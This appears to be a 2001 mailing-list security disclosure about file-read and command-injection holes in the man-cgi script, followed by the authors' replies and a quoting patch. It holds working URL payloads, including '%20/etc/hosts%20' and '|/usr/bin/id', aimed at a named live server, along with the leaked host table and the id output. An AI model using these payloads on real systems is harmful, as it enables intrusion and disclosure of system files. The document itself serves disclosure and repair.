Upon researching several possible cgi based man holes I ran across the
following bugged code

© 1994-1999 Man-cgi 2.00, Panagiotis Christias
<christia@softlab.ntua.gr>

© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,
<d.j.adams@soton.ac.uk>

© 1994 Man-cgi 1.15, Panagiotis Christias
<christia@theseas.ntua.gr>

© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana
<tom@sorry.vse.cz>


the issue is with the filtering of %20 or any other hex encoded url in
adittion to a known file name will allow you
to view the file with permissions of the web server ... in some
implementations it is also possible to specify the
path to a known executable and thus you are able to run the executable for
example /usr/bin/id. These issues
may be used to disclose sensitive information on your servr or possible
allow someone to run any command they want on
it ... if you have further questions mail me.

----------------------------------------------------------

http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20
reveals the following

#
# Internet host table
#
127.0.0.1       localhost
#147.102.222.210        achilles.noc.ntua.gr    achilles
147.102.222.210 achilles.noc.ntua.gr    achilles
147.102.222.211 patroklos.noc.ntua.gr   patroklos
147.102.222.230 ulysses.noc.ntua.gr     ulysses
# Required for backup
147.102.222.250 menelaos.noc.ntua.gr    menelaos

-----------------------------------------------------------

http://xxx/cgi-bin/man-cgi?/usr/bin/id
or
http://xxx/cgi-bin/man-cgi?|/usr/bin/id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

-----------------------------------------------------------

below are the Authors Patches and comments from one of the people who has
modified the script
to operate on other os's

Sorry for my delayed reply, too much work to do and too much email
 to read and reply. Here is a quick fix:

 ***************
 *** 185,191 ****
         { print "<HR align=left width=640 size=2 noshade>"; \
         printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
         printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
 !      PAGE=$COMMAND URL=$MANCGI

   fi;

---- 178,184 ----
         { print "<HR align=left width=640 size=2 noshade>"; \
         printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
         printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
 !      PAGE="$COMMAND" URL="$MANCGI"

   fi;

 The values of the PAGE and URL variables should be quoted. This is the
first
 step. I should correct several other parts of the script. I was quite
naive
 when I wrote man-cgi several years ago :)

 You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi

 Regards,
 Panagiotis
 --
 Panagiotis J. Christias    Network Management Center
 P.Christias@noc.ntua.gr    National Technical Univ. of Athens, GREECE

----------------------------------------------------------------

 On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:
 Sorry to be so dim, but I really could not fathom the point you were
trying
 to make with your first email.  Only now do I understand the significance
of puting in the %20 (space
 character).  I still don't understand your anonymity, but I guess I can
live  with it.
 The man-cgi script was written by Panagiotis Christias, and I made some
 enhancements and got it working for Solaris.  It works so well that noone
 (AFAIK) has bothered to re-write it for Perl.

 I am grateful that you have pointed out this security loop hole to us.
 It  is up to you whether you report it through the normal channels or not.
 As  it can be used to read the /etc/passwd file it could be a real
security
 threat.  I will look at the script and see if I can find a solution, I
hope
 Panagiotis will do the same.

 --
 David Adams
 Computing Services
 Southampton University